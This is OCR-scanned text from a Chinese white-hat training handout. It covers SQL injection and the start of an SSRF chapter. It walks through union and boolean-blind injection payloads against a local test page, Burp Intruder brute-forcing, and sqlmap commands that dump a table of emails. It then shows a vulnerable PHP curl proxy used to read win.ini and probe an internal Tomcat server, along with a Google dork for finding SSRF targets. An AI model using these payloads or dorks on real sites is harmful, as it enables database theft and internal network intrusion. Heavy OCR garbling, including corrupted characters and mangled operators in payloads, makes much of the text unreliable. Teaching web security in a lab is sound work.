其 中 问号 处 替换 为 从 1 开始 的 数字 ， 一 个 一 个 尝试 它们 。 直 到 东 个 数字 N AAG > A 
么 列 数 为 N-1。 


例如 我 这 里 ， 先 尝试 1， 没有 报错 : 


e C localhost/sal.php?idz 19620order?620by976201 
D: mm 

ID : 1 order by 1 

Info : item #1 

尝试 2 也 没有 报错 ， 然 后 尝试 3 的 时 候 : 
区 C localhost/sgl.php?idz 19620o0rder?620by9?6203 

D IE 
数据 库 错 误 : Unknown column '3' in ‘order clause 
出 现 了 错误 ， 说 明 列 数 是 2 。 


确定 显示 的 列 
我 们 可 以 构造 语句 了 : 


1 and 1=2 union select 1,2 
= C | © localhost/sql.php?7id=1%20and%201=2%20union%20select%201,2 
ID: ma 

| ID : 1 and 1=2 union select 1,2 

Info: 2 

显示 位 置 为 2 号 位 ， 而 且 只 有 一 个 显示 位 置 。 


查询 用 户 及 数据 库 名 称 


在 MySQL 中， current user 函数 显示 用 户 名 称 ， database 函数 显示 当前 数 
据 库 名 称 。 这 里 只 有 一 个 显示 位 置 ， 为 了 方便 起 见 ， 我 们 可 以 使 用 concat 函数 一 
` HE 二 HZ 

次 性 显示 出 来 » 


1 and 1-2 union select 1,concat(current user(),' ',database()) 





= C | © localhost/sql.php?id=1%20and%201=2%20union%20select%201,concat(current_user(),%2 
ID lé | 得 询 | 





ID : 1 and 1=2 union select 1,concat(current user(), ' ',database()) 
Info : root@localhost test 


可 以 看 到 这 里 的 用 户 名 称 是 root ， 数 据 库 名 称 是 test ° RE A Hz TA 
到 ， 基 本 就 可 以 断定 是 root 权限 了 。 


查询 衣 的 数量 


MySQL 中 有 一 个 数据 库 叫 做 information schema ， 储 存 数 据 库 和 衣 的 元 信 
息 。 information schema 中 有 两 个 重要 的 表 ， 一 个 叫 tables ， 人 储存 表 的 元 信 
息 ， 有 两 列 特 别 重要 ， table schema 是 所 属 数据 库 ， table name 是 表 名 称 。 
另 一 个 表示 columns ， 储 存 列 的 源 信息 ， table name 列 是 所 属 表 名 

称 ， column name 7| 7444» 


1 and 1-2 union select i1,count(table name) from information sche 
ma.tables where table schema-database() 





e C | © localhost/sql.php?id=1+and+1%3D2+union+select+1%2Ccount%28table name9629 from information schema.ti yr 
* ^ 
ID : Bis 


ID : 1 and 1=2 union select 1,count(table name) from information schema.tables where 
table schema=database() 


Info : 7 


这 里 我 们 使 用 count 元 数 查 询 出 了 表 的 数量 ， 一 共 七 个 。 这 里 我 们 只 查询 当前 数 
据 库 ， 如 果 要 查询 全 部 ， 可 以 把 where 子 句 给 去 挥 。 


$19 RA 


因为 它 只 能 显示 一 条 记录 ， 我 们 使 用 limit 子 尹 来 定位 显示 哪 一 条 。 limit > 
SA 


名 格式 为 limit m,n » HP m 是 从 零 开 始 的 起 始 位 置 ，n 是 记录 数 。 我 们 构 
ue. 
iE: 


1 and 1-2 union select 1,table name from information schema.tabl 
es where table schema-database() limit ?,1 


我 们 需要 把 问号 处 换 成 0 ~ 6， 一 个 一 个 党 试 ， 七 个 表 名 称 就 出 来 了 Xd s 我 们 
获取 第 一 个 表 的 名 称 。 


€ C | © localhost/sql.php?id=1+and+1%3D2+union+select+1%2Ctable name+from+information schema.tables+where+ 


ID : 查询 


ID : 1 and 1=2 union select 1,table name from information schema.tables where 
table schema=database() limit 0,1 


Info : email 


它 叫 email » EAE To RLG-MRME—BPM PRT  pRB—DR 


示 无 关 紧 要 的 信息 ， 可 以 继续 寻找 。 
查询 列 数量 
与 表 数 量 的 查询 类 似 ， 我 们 需要 把 所 有 table 换 成 column 。 我 们 构造 : 


1 and 1-2 union select i1,count(column name) from information sch 
ema.columns where table name-z'email' 


X 


€ C | © localhost/sql.php?id=1+and+1%3D2+union+select+1%2Ccount%28column name9629 «from--information schem. yr 


ID : Big) 


ID : 1 and 1=2 union select 1,count(column name) from information schema.columns where 


table namez'email' 


Info : 2 


一 共有 两 个 。 
查询 列 名 
我 们 把 count 去 挤 ， 加 上 limit ， 就 出 来 了 : 


1 and 1-2 union select 1,column name from information schema.col 
umns where table name-'email' limit ?,1 


同样 ， 我 们 需要 把 问号 替换 为 0 和 1: 


& C | © localhost/sql.php?id=1+and+1%3D2+union+select+1%2Ccolumn name+from+information schema.columns+wh yy 
ID: Eig 


ID : 1 and 1=2 union select 1,column name from information schema.columns where 
table name='email' limit 0,1 


Info : userid 


我 们 这 里 查询 结果 为 ， 第 一 列 叫 做 userid ， 第 二 列 叫 做 email 。 


1 and 1-2 union select 1, count(1) from email 


| e C | © localhost/sql.php?id=1+and+1%3D2+union+select+1%2C+count%281%29+from+email 
| ID : 查询 
ID : 1 and 1=2 union select 1, count(1) from email 


| Info : 2 


查询 记录 


1 and 1-2 union select 1,concat(userid,' ',email) from email lim 
it ?,1 


我 们 把 问号 替换 为 0 和 1， 就 得 到 了 所 有 的 数据 。 

<- Œ | © localhost/sql.php?id=1+and+1%3D2+union +select+1%2Cconcat%28userid%2C%27 +%27%2Cemail%29+from+er yr 
ID : Bia 

ID : 1 and 1=2 union select 1,concat(userid,' ';email) from email limit 0,1 


Info : 123 test2@example.com 


手工 注入 : 基于 布尔 值 


在 一 些 情 况 下 ， 页 面 上 是 没有 回 显 的 。 也 就 是 说 ， 不 显示 任何 数据 库 中 的 信息 。 我 
们 只 能 根据 输出 判断 是 否 成 功 、 失 败 、 或 者 错误 。 这 种 情况 就 叫做 育 注 。 


比如 说 ， 我 们 把 上 面 的 代码 改 一 下 ， 倒 数 第 三 行 改 为 : 


HF jA SALÈ A 


echo "<p> 和 存在 此 记 K</p>" ， 


这 样 我 们 就 不 能 通过 union 把 它 显 示 到 页 面 上 。 上 所 以 我 们 需要 一 些 百 注 技巧 。 这 
种 技巧 之 一 就 是 基于 布尔 值 ， 具 体 来 说 就 是 ， 如 果 我 们 想 查询 整数 值 ， 构 造 布 尔 语 
幻 直接 爆破 ; 如 果 想 查询 字符 串 值 ， 先 爆破 它 的 长 度 ， 再 爆破 每 一 位 。 


查询 用 户 及 数据 库 名 称 

基于 布尔 的 注入 中 ， 判 断 注 入 点 的 原理 是 一 样 的 。 确 定 注 入 点 之 后 我 们 直接 和 但 询 用 
户 及 数据 库 名 称 (当然 也 可 以 跳 过 ) 。 由 于 这 LAPEER AX AC 所 以 
我 们 只 选取 其 中 一 个 ， 比 如 数据 名 称 。 

首先 爆破 数据 库 名 称 的 长 度 ， 我 们 构造 : 


1 and (select length(database()))-? 


问号 处 需要 替换 为 数字 ， 从 1 开始， 直至 出 现 正 确 的 信息 。 为 了 简化 操作 ， 这 里 我 
们 可 以 使 用 Burp 了 。 


attack save columns 


results 


request | status | error | time...) length comment 
2 200 EE E-E a 


200 x5 |  —  — 
200 — EL EL 8988 —] — — — 
20 | fa 


305 | | 
[Bd Bo | | 
B p | | 
[md 305 | — j| 
[d BOS 
[£d B65 | 
[md pos | | 
B BOS 
[ad Bo | — j| 
"dad Bos | 
U pos | 


<form method-"GET" action=""> 
IbOO 
<input type="text" name="id" /> 
<input type="submit" value="000" ”> 
«/ form» 
<p>IDOO and (select length(database()))-204zc/p»zpsDLDpnadanin :- ,;!p- 





漏洞 篇 SQL 注入 


它 的 长 度 为 4， 这 里 我 们 再 构造 : 


1 and (select substr(database(),$1,1))=$2 


我 们 需要 把 $1 替换 成 1~4 的 整数 ( substr 从 1 开始 ) ， 把 $2 替换 成 a~Z 
、0~9 以 及 _ 的 ASCLL 十 六 进 制 (SQL 不 区 分 大 小 写 ) 。 这 里 我 们 最 好 把 这 些 
十 六 进 制 值 存 成 一 个 列表 ， 便 于 之 后 使 用 。 


之 后 开始 爆破 (类 型 选择 cluster bomb ， 第 一 个 payload 选择 number ， 第 二 
个 payload 选择 preset lists ) 


attack save columns 





我 们 通过 查 表 得 知 ， 结 果 为 test o 
iX ACE 


1 and (select count(table name) from information schema.tables w 
here table schemazdatabase( ) )=? 


2f 


漏洞 篇 SQL 注入 


问号 处 替换 为 从 一 开始 的 数字 。 我 们 可 以 看 到 ， 数 量 为 7。 


attack save columns 


Filter: showing all items 


request payload status | error | time...) length comment 
T x 200 = 





查询 表 名 


我 们 这 里 演示 如 何 查 询 第 一 个 表 的 表 名 。 
首先 查询 表 名 长 度 


1 and (select length(table name) from information schema.tables 
where table schema-zdatabase() limit 0,1)-? 


问号 处 换 成 从 1 开始 的 整数 。 长 度 为 5: 
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漏洞 篇 SQL 注入 


attack save columns 
Filter: showing all items 


x 


SiN S 

8— C — — 5 iB: 
3 1 200 |  — - 
3 -5 Oa uil | 
6 ^16 O iik. | .— |. 
4 à" — po jl. | — | 
B mm — M |. wt LL || 


"request | response 
| | params | headers 


E T 


GET 
/sql.php?id-ltande-&ZBselectrlength&ZBHtable namet29+from+information schema.tables = 
twheret+table schema&s3sDdatabase&zB&zZS-rlimitr-0s$201$29&3D05 HTTP/1.1 

Host: localhost 

Proxy-Connection: keep-alive 

Upgrade-Insecure-Redquests: 1 

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebEit/537.36 (EHTML, 


ee 0 matches 





之 后， 再 爆破 每 个 字符 。 


1 and (select substr(table name,$1,1) from information schema.ta 
bles where table schema-database() limit 0,1)=$2 


$1 58687] 1-589 4t ^ $2 的 配置 为 上 面 的 列表 。 
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漏洞 篇 SQL 注入 


attack save columns 


HTTPř1.1 200 OK 

Host: localhost 
Connection: close 
X-Powered-By: PHP/5.5.10 
Content-type: text/html 


<form method="GET" action=""> 





BRA > ZR email 。 
查询 列 数量 
我 们 下 面 演示 查询 email 表 的 列 数 。 


1 and (select count(column name) from information schema.columns 
where table name-'email')-? 


问号 处 替换 为 从 一 开始 的 数字 。 我 们 可 以 看 到 ， 数 量 2。 
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漏洞 篇 SQL 注入 


attack save columns 


Filter: showing all items 


request payload status error | time...) length comment 
s 200 sit 








查询 列 名 称 


作为 演示 ， 我 这 里 查询 第 二 列 ( limit 1,1 ) 的 名 称 。 
首先 需要 查询 其 长 度 


1 and (select length(column name) from information schema.column 
s where table name-'email' limit 1,1)-? 


问号 处 换 成 从 1 开始 的 整数 。 长 度 为 5: 
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漏洞 篇 SQL 注入 


attack save columns 





后 爆破 每 个 字符 : 


1 and (select substr(column name,$1,1) from information schema.c 
olumns where table name-'email' limit 1,1)=$2 


$1 58687] 1-589 4t ^ $2 的 配置 为 上 面 的 列表 。 
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漏洞 篇 SQL 注入 


attack save columns 


Filter: showing all items 














结果 是 email 。 

a. 2- € 

查询 行 数量 
1 and (select count(1) from email)-? 


问号 处 替换 为 从 一 开始 的 数字 。 我 们 可 以 看 到 ， 数 量 为 2 。 
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漏洞 篇 SQL 注入 


attack save columns 


Filter: showing all items 


request payload status error | time... length comment 
i be 200 Ao 





查询 记录 
我 们 这 里 演示 如 何 查询 第 一 条 记录 的 email 列 。 
首先 是 长 度 


1 and (select length(email) from email limit 0,1)=? 


问号 处 替换 为 从 一 开始 的 数字 。 我 们 可 以 看 到 ， 长 度 为 17。 
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漏洞 篇 SQL 注入 


attack save columns 


Filter: showing all items 


request payload status error | time...) length comment 
20 200 3211 


tat po ee 
2 2 — HR BEBE I — 





后 爆破 每 个 字符 : 


1 and (select substr(email,$1,1) from email limit 0,1)-$2 


$1 配置 为 1~ 17 的 整数 ，$2 的 配置 为 所 有 可 见 字符 的 十 六 进 制 ascll 4& (0x20 
~ 0x7e) » 


这 个 时 间 有 些 长 ， 就 不 演示 了 。 
SalMap 


下 载 
安装 Python 之 后 ， 执 行 


pip install sqlmap 
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然后 


C:\Users\asus> sqlmap 











—— {1.1#pip} 


| |V | | http://sqlmap.org 
Usage: sqlmap [options] 


sqglmap: error: missing a mandatory option (-d, -u, -l, -m, -r, - 
g, -C, -X, --wizard, --update, --purge-output or --dependencies) 
use -h for basic or -hh for advanced help 


Á 


Press Enter to continue... 


判断 注入 点 
直接 使 用 -u 命令 把 URL 给 SglMap 会 判断 注入 点 。 


sqlmap -u http://localhost/sql.php?id- 


要 注意 这 样 sqlmap 会 判断 所 有 的 动态 参数 ， 要 指定 某 个 参数 ， 使 用 -p 


sqlmap -u http://localhost/sql.php?id- -p id 


[*] starting at 12:05:40 


[12:05:40] [WARNING] provided value for parameter 'id' is empty. 
Please, always use only valid parameter values so sqlmap could 

be able to run properly 

[12:05:40] [INFO] testing connection to the target URL 
[12:05:41] [INFO] heuristics detected web page charset 'utf-8' 
[12:05:41] [INFO] testing if the target URL is stable 

[12:05:42] [INFO] target URL is stable 

[12:05:44] [INFO] heuristic (basic) test shows that GET paramete 
r 'id' might be injectable (possible DBMS: 'MySQL') 

[12:05:46] [INFO] testing for SQL injection on GET parameter 'id 


it looks like the back-end DBMS is 'MySQL'. Do you want to skip 
test payloads specific for other DBMSes? [Y/n] 


sglmap 报告 了 参数 id 可 能 存在 注入 。 
如 果 参 数 在 HTTP 正文 或 者 Cookie 中 ， 可 以 使 用 --data «data» 以 
及 --cookie «cookie» 来 提交 数据 。 
获取 数据 库 及 用 户 名 称 
--dbs 用 于 获取 所 有 数据 库 名 称 ， --current-db 用 于 获取 当前 数据 


E > --current-user 获取 当前 用 户 。 


C:\Users\asus> sqlmap -u http://localhost/sql.php?id- -p id --cu 
rrent-db 


[12:10:44] [INFO] fetching current database 

[12:10:54] [INFO] retrieved: test 

current database: ‘test ' 

[12:10:54] [INFO] fetched data logged to text files under 'C:\Us 
ers\asus\.sqlmap\output\localhost' 


[*] shutting down at 12:10:54 


获取 衣 名 


-D 用 于 指定 数据 库 名 称 ， 如 果 未 指定 则 获取 所 有 数据 库 下 的 表 
名 。 --tables 用 于 获取 表 名 。 


C:\Users\asus> sqlmap -u http://localhost/sql.php?id- -p id -D t 
est --tables 


[12:13:25] [INFO] fetching tables for database: 'test' 
[12:13:28] [INFO] the SQL query used returns 7 entries 
[12:13:30] [INFO] retrieved: email 

[12:13:32] [INFO] retrieved: history 

[12:13:34] [INFO] retrieved: iris 

[12:13:36] [INFO] retrieved: message 

[12:13:38] [INFO] retrieved: result 

[12:13:40] [INFO] retrieved: sqlinj 

[12:13:42] [INFO] retrieved: test table 

Database: test 

[7 tables] 


| email | 
| history | 
| data | 
| message | 
| result | 
| sqlinj | 
| test_table | 


[12:13:42] [INFO] fetched data logged to text files under 'C:\Us 
ers\asus\.sqlmap\output\localhost' 


[*] shutting down at 12:13:42 


获取 列 名 
-T 用 于 指定 表 名 ， --columns 用 于 获取 列 名 。 


C:\Users\asus> sqlmap -u http://localhost/sql.php?id- -p id -D t 
est -T email --columns 


[12:15:02] [INFO] fetching columns for table 'email' in database 
‘test! 

[12:15:04] [INFO] the SQL query used returns 2 entries 

[12:15:06] [INFO] retrieved: userid 

[12:15:08] [INFO] retrieved: varchar(16) 

[12:15:11] [INFO] retrieved: email 

[12:15:14] [INFO] retrieved: varchar(32) 

Database: test 

Table: email 

[2 columns] 


| Column | Type | 
| email | varchar(32) | 
| userid | varchar(16) | 
[12:15:30] [INFO|] fetched data logged to text files under 'C:\Us 


ers\asus\.sqlmap\output\localhost' 


[*] shutting down at 12:15:30 


获取 记录 


--dump 用 于 获取 记录 ， 使 用 -C 指定 列 名 的 话 是 获取 有 一 列 的 记录 ， 不 指定 就 
是 获取 整个 表 。 


C:\Users\asus> sqlmap -u http://localhost/sql.php?id- -p id -D t 
est -T email --dump 


[12:16:59] [INFO] fetching columns for table 'email' in database 
七 est ' 

[12:16:59] [INFO] the SQL query used returns 2 entries 

[12:16:59] [INFO] resumed: userid 

[12:16:59] [INFO] resumed: varchar(16) 

[12:16:59] [INFO] resumed: email 

[12:16:59] [INFO] resumed: varchar(32) 

[12:16:59] [INFO] fetching entries for table 'email' in database 
‘test! 

[12:17:01] [INFO] the SQL query used returns 2 entries 

[12:17:04] [INFO] retrieved: test2@example.com 

[12:17:06] [INFO] retrieved: 123 

[12:17:08] [INFO] retrieved: wizard.z@qq.com 

[12:17:10] [INFO] retrieved: 233837063867287 

[12:17:10] [INFO] analyzing table dump for possible password has 

hes 

Database: test 

Table: email 

[2 entries] 

djaesacoocaasoescaooc jeccaecosnaeccacoosoc- 十 

| userid | email | 

OS jecooscooonccacoooocc- 十 

| 123 | test20example.com | 

| 233837063867287 | test@example.com | 

j2ac2sasceacaeocoancooc e a + 


[12:17:10] [INFO] table 'test.email' dumped to CSV file 'C:\User 
SNasusN.sqlmapNoutputNlocalhostNdumpNtestNemail.csv' 

[12:17:10] [INFO] fetched data logged to text files under 'C:\Us 
ers\asus\.sqlmap\output\localhost' 


[*] shutting down at 12:17:10 


文本 型 注入 点 


上 面 我 们 一 直 在 讲解 数值 型 注入 点 ， 如 果 我 们 把 SQL 语句 


$sql 


PX 7J 


$sql 


= "select id, info from sqlinj where id-$id"; 


= "select id, info from sqlinj where id='$id'"; 


漏洞 篇 SALA 


那么 在 测试 的 时 候 就 会 出 现 1=1 和 1-2 都 存在 的 情况 。 


€ > C |O localhost/sql.php?id=1+and+1%3D1 
Dp: [a 
ID : 1 and 1=1 

存在 此 记录 



























































€ > C |@IocalhostysqLphp?id=1+and+193D2 —— 
D: Cd 
ID = lV atid 1-2 

仓 在 此 记录 











这 时 我 们 就 不 知道 它 是 过 滤 了 还 是 真 的 有 注入 点 。 所 以 我 们 可 以 修改 参数 ， 用 一 个 
单 引 号 闭合 前 面 的 引号 ， 再 用 一 个 注释 符号 ( # 或 者 -- ) 来 注释 掉 后 面 的 引 
ade 


1' and 1-21 # 
1' and 1=2 # 
1 order by ?3 # 


MY K 


e The SQL Injection Knowledge Base 
e 新 手指 南 : DVWA-1.94 4) 2X 42 Z SQL Injection 
e 新 手指 南 : DVWA-1.9 全 级 别 教程 之 SQL Injection(Blind) 
e SqlMap 用 户 手册 
e Sqlmap 用 户 手 册 ( 续 ) 
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漏洞 篇 SQL 注入 


e MySQL 手工 注入 常用 语句 
e Kali Linux Web 渗透 测试 秘籍 


大 


e Kali Linux Web 渗透 测试 秘籍 
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米 斯 特 白 帽 培训 讲义 漏洞 篇 SSRF 


讲师 : ghOstkey 
整理 : 飞龙 
WU : CC BY-NC-SA 4.0 


很 多 Web 应 用 都 提供 了 从 其 他 服务 器 上 获取 数据 的 功能 。 使 用 用 户 指定 的 URL ， 
web 应 用 可 以 获取 图 片 ， 下 载 文件 ， 读 取 文 件 内 容 等 。 这 个 功能 如 果 被 恶意 使 用 ， 
可 以 利用 存在 缺陷 的 Web 应 用 作为 代理 ， 攻 击 远程 和 本 地 服务 器 。 这 种 形式 的 攻 
KANJRI KARA (SSRF) 。 


原理 
«?php 
$url = Q$ GET['url']; 
if($url) { 


$ch = curl_init(); 

curl_setopt($ch, CURLOPT_URL, $url); 
curl_setopt($ch, CURLOPT RETURNTRANSFER, 1); 
curl setopt($ch, CURLOPT HEADER, 9); 

curl setopt(S$ch, CURLOPT SSL VERIFYPEER, false); 
curl setopt($ch, CURLOPT SSL VERIFYHOST, false); 
$co = curl exec(S$ch); 

curl close($ch); 

echo $co; 


这 段 代 码 从 URL. 中 读 取 url 参数 ， 之 后 访问 url 参数 所 指向 的 URL HR RE 
把 资源 显示 在 页 面 上 。 (当然 这 个 代码 有 些 简陋 了 ， 不 是 丨 正 的 代理 ， 有 些 资源 可 
能 处 理 不 好 。) 


我 们 将 其 保存 为 ssrf.php 并 部 署 。 之 后 我 们 访 
l=] localhost/ssrf.php?url-http://www.baidu.com 


Wizard 





WX EET, aE x VOX 


K C | © localhost/ssrf.php?url=http://www.baidu.com 

















可 以 看 到 显示 正常 。 这 个 漏洞 还 可 以 用 于 访问 本 地 的 图 片 ， 我 们 再 访 
|l] file:///C:/Windows/win.ini 


Wizard 


FAN view-sourcelocalhos; x W  * 


C | © view-source:localhost/ssrf.php ?url=file:///C:/Windows/win.ini 


1|; for 16-bit app support 
2 [fonts] 

3 [extensions] 

4| [mci extensions] 

5| [files] 

6| [Mail] 

7| MAPI=1 

s [ResponseResult] 

9 ResultCode=0 





-— 


ES 


页 面 上 是 乱 的 ， 但 是 我 们 查看 源 代码 ， 也 可 以 正常 显示 。 
利用 

可 以 对 服务 器 所 在 内 网 以 及 本 地 进行 端口 扫描 ， 获 取 服 务 的 指纹 信息 。 指 纹 识别 通 
过 访问 上 默认 文件 米 实 现 : 


Bai EH ss mz wm 知道 音乐 BH 视频 地 图 BH 
白 度 识 图 
粘贴 图 片 网 址 D | 从 本 地 上 传 
http://10.50.33.43:8080/manager/images/tomcat. gif 12 3 =b 





WWW.Wooyun. 


BalGm SF 新 闻 网 页 贴吧 知道 音乐 图 片 视频 地 图 百科 
| http://10.50.33.43:8080/ | 


| 


ub 相似 图 片 


RA" 找到 该 图 片 不 同 尺 寸 23 张 


这 张 图 中 ， 我 们 访问 了 10.50.33.43 的 Tomcat 服务 的 默认 文 
fF» 10.50.33. 43 是 内 网 ， 我 们 直接 访问 是 访问 不 了 的 ， 但 是 通过 SSRF 就 可 


以 。 并 且 ， 我 们 通过 访问 Tomcat 的 默认 文件 确定 了 这 人 台 机 子 上 部 署 了 Tomcat 服 


Z- o 


确定 了 所 部 着 的 服务 之 后 > 我 们 就 可 以 有 针对 性 的 攻击 内 网 部 署 的 应 用 。 上 比如 ST2 
和 SQL 注入 这 种 通过 GET 方法 实施 的 攻击 。 


我 们 还 可 以 利用 孩 漏 洞 读 取 服务 器 中 的 配置 文件 ， 比 如 上 面 的 win.ini 。 


AF 


以 下 业务 场景 容 多 出 现 这 种 漏洞 : 


1. 应 用 从 用 户 指定 的 URL 获取 图 片 ， 然 后 把 它 用 一 个 随机 名 称 保存 在 硬盘 上 ， 
并 展示 给 用 户 : 

2. 应 用 获取 用 户 指定 URL 的 数据 (MPRA HTML) 9 HR 2&7 socket 
和 服务 器 建立 TCP 连接 ， 传 输 原 始 数 据 。 


3. 应 用 根据 用 户 提 供 的 URL， 抓 取 用 户 的 Web 站点， 并 且 目 动 生成 移动 Wap 
3h © 


4. 应 用 提供 测速 功能 ， 能 够 根据 用 户 提 供 的 URL， 访 问 目标 站 点 ， 以 获取 其 在 对 
应 经 纬度 的 访问 速度 。 
Web 功能 


我 们 从 上 面 的 概述 可 以 看 出 ，SSRF 是 由 于 服务 端 获取 其 它 服 务 器 的 相关 信息 的 功 
能 中 形成 的 ， 因此 我 们 可 以 列举 几 种 在 Web 应 用 中 ， 常 见 的 从 服务 端 获取 其 它 服 
务 端 信 A 的 功能 Ht, e 


1) 2X : 通过 URL 分 享 网 页 内 容 


早期 分 享 应 用 ， 为 了 更 好 地 提供 用 户 体 验 ，WEB 应 用 在 分 享 功能 汇总 ， 通 过 会 获 
取 目 标 URL 地 址 网 页 内 容 中 的 «title» 标签 或 

者 «meta name-"description" /> 标签 中 的 文本 内 容 ， 作 为 显示 ， 来 提供 更 好 
的 用 户 体 验 。 例 如 ， 人 人 网 分 享 功 能 











Q |ì widget.renren.com/ ?resourceUrl- https:/ /www.sobug.com 
(a) 书签 栏 16 个 OS Xise [A] 百度 一 下 ， 你 就 知道 d$ 谷 欧 搜索 引擎 v [Hadoop] 搭建 完全 [E] pyspider £3 Google fx [Linux] Linux? 
CUNA AR 获取 人 人 分 享 按钮 
人 人 分 享 
全 部 好 友 自己 收藏 指定 好 友 


请 在 此 输入 分 享 的 理由 


0/500 


SOBUG 众 测 平台 
PP Toggle navigation 创新 众 包 模式 基于 效果 付费 解决 企业 96% 的 安全 问题 AAS. Rit! A 
帽子 申请 提现 奖金 ， 只 要 资料 验证 无 误 ， 我 们 承诺 将 在 23 小 时 59 分 59 秒 内 打 款 。 WHE, RI, 


A 添加 图 片 





ip 
pu 


http://widget.renren.com/****?resourceUrl-**** 


通过 目标 URL 地 址 获取 了 title 标签 和 相关 文本 内 容 。 如 果 在 此 功能 中 没有 对 目 
标 地 址 范围 做 过 滤 与 限制 ， 就 存在 SSRF 漏洞 。 

根据 这 个 功能 ， 我 们 可 以 发 现 许多 互联 网 公司 都 有 这 样 的 功能 ， 下 面 是 我 们 从 百度 
分 享 集成 的 截图 ， 如 下 : 


分 享 到 


ES AAR ig] Pu 
百度 相册 国 开心 网 

4e 腾讯 朋友 百度 贴吧 
si RE OI m sss 
百度 新 首页 A QQ 好 友 
Maas Gj QQ 收藏 


O 百度 个 人 中 心 — 8 我 的 淘宝 


项 百度 空间 四 sx 


f=] 搜狐 白 社 会 e Bane 





从 国内 东 漏 洞 提交 平台 上 提交 的 SSRF MM > TARR AGAR. ARs HRA 
A 40 S] ARE RIL PSA LAE SSRF 漏洞 。 


2) 转 码 服务 : 通过 URL 地 址 把 原 地 址 的 网 页 内 容 调 优 使 其 适合 手机 屏幕 浏览 


由 于 手机 屏幕 大 小 的 关系 ， 直 接 浏览 网 页 内 容 时 会 造成 许多 不 便 ， 因 此 有 些 公司 提 
供 了 和 转 码 功能 ， 把 网 页 内 容 通 过 相关 手段 转 为 适合 手机 屏幕 浏览 的 演示 。 例 如 百 
度 、 腾 讯 、 搜 狗 等 公司 都 提供 在 线 转 码 服务 。 


3) 在 线 翻 译 : 通过 URL 地 址 翻译 对 应 文本 的 内 容 。 提 供 此 功能 的 国内 公司 有 百 


4) 图 片 加 载 与 下 载 : 通过 URL 地 址 加 载 或 下 载 图 片 


此 功能 用 到 的 地 方 很 多 ， 但 大 多 比较 隐秘 ， 上 比如 有 些 公司 加 载 自家 图 片 服务 疆 上 的 
图 片 用 于 展示 。 (有 些 公 司 会 把 外 站 图 片 转 存 到 自家 服务 器 ， 所 以 在 HTTP ERA 
片 时 就 可 能 造成 SSRF 问题 。) 


5) 图 片 、 文 章 收藏 功能 


此 处 的 文章 收藏 类 似 于 分 笃 功 能 中 获取 URL. 地 址 中 的 标题 以 及 内 容 作 为 显示 ， 目 
的 还 是 为 了 更 好 的 用 户 体 验 。 图 片 收藏 就 类 似 于 图 片 加载 。 


6) 未 公开 的 API 实现 以 及 其 他 调用 URL 的 功能 


此 处 类 似 的 功能 有 360 提供 的 网 站 评分 ， 以 及 有 些 网 站 通过 API 获取 远程 地 址 
XML 文件 来 加 载 内 容 。 


这 些 功能 中 除了 分 宜 和 转换 服务 为 公共 服务 ， 其 他 功能 均 有 可 能 在 企业 应 用 开发 过 
FE P 38 | 


URL X41] 43% 


根据 对 存在 SSRF 漏洞 的 URL WAA HE 9 WR ^ NRA IRL Ag u^ A SUR 
一 下 关键 字 : 


share 
wap 

url 
image 
link 

SIC 
source 
target 

U 

39 
display 
sourceUrl 
imageUrl 
domain 


如 果 利 用 google 语法 ( inurl:url- ) 加 上 这 些 关键 字 去 寻找 SSRF 漏洞 ， 耐 心 
的 验证 ， 现 在 还 是 可 以 找到 存在 的 SSRF 漏洞 。 


i i] FS LE 
例如 


http://www.douban.com/***/service?image-http://www.baidu.com/img 
/bd logoi.png 


排除 法 一 : 


(EA 直接 右键 图 片 ， 在 新 窗口 打开 图 片 ， 如 果 浏 览 器 上 URL 地 址 栏 中 
是 http://www.baidu.com/img/bd logoi.png ， 则 不 存在 SSRF 。 


排除 法 二 : 
你 可 以 使 用 Burp 等 抓 包工 具 来 判断 是 否 是 SSRF， 首 先 SSRF 是 由 服务 端 发 起 的 
请 求 ， 因 此 在 加 载 图 片 的 时 候 ， 有 是 由 服务 端 发 起 的 ， 所 以 我 们 本 地 浏览 器 中 的 请 求 


就 不 应 该 存在 图 片 的 请 求 ， 在 此 例子 中 ， 如 果 刷 新 当前 页 面 ， 有 如 下 请 求 ， 则 可 淹 
断 不 是 SSRF 。 


|| www.douban.com, .service?image -http:/ /www.baidu.com/img/bd logol.png 


eoo Burp Suite Professional v1.5.01 - licensed to LarryLau 





Burp Intruder Repeater Window Help 


Target Spider | Scanner | Intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Options | Alerts 


| Intercept | History | Options | 


Request to http:/ /www.baidu.com:80 [180.149.131.236] 


| Forward | Drop | | Interceptis on | | Action | 


ET /img/bd logol.png HTTP/1.1 
ost: www.haidu.com 


Cache-Control: max-adge-ü 

Accept: image/webp,*/*:dgq-0.8 

If-None-Match: "l1ec5-502264862ae4cU" 

If-Modified-Bince: Wed, 03 Sep 2014 10:00:27 GMT 

User-Agent: Mozilla/5.0 (Macintosh: Intel Mac OB X 10 9 5j AppleWebKit/537.36 (KHTML, like Gecko} Chrom 
Referer: http://www.douban.cam? /service?imadge-httyp://www.baidu.com/imeg/bd logol. png 
Accept-Encoding: gzip,deflate,sdcn 

Accept—-Lanquaqe: zh-CN,zh;q-20.8,8n;q-20.5,zh-TW;e-20.4 


tite ARBRE > UA S] eA? m], 25 19 ERA ARE H , i222 
SSRF 漏 河 。 如 果 浏览 器 向 搜狗 请 求 图 片 ， 那 么 就 说 明 搜狗 服务 器 发 送 了 请 求 ， 向 
百度 请 求 图 片 ， 可 能 存在 SSRF 。 


此 处 说 明 下 ， 为 什么 这 边 用 排除 法 来 判断 是 否 存 在 SSRF。 举 个 例子 : 











€ C ||) read. com /image?imageUrl-http: / /www.baidu.com/img/bd logol.png 
stem 国 书签 栏 (M) 16 个 05 x 快 捷 键 小 技 ， [| T. Ren $ SmI 香港 w [Hadoopl #824 
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现在 大 多 数 修 复 SSRF 的 方法 基本 都 是 区 分 内 外 网 来 做 限制 。 如 果 我 们 请 求 : 





http://read.******.com/image?umageUrl-http://10.10.10.1/favicon. 
ico 


而 没有 内 容 显 示 ， 我 们 就 无 法 判断 此 处 不 存在 SSRF， 或 
者 http://10.10. 10.1/favicon.ico 被 过 滤 了 ， 还 是 根本 就 没有 这 个 图 片 。 因 
为 我 们 事先 不 知道 这 个 地 址 的 文件 是 否 存 在 ， 我 们 判断 不 出 是 哪个 原因 ， 所 以 使 用 
排除 法 。 


实例 验证 


经 过 简单 的 排除 验证 之 后 ， 我 们 就 要 验证 看 看 此 URL 是 否 可 以 来 请 求 对 应 的 内 网 地 
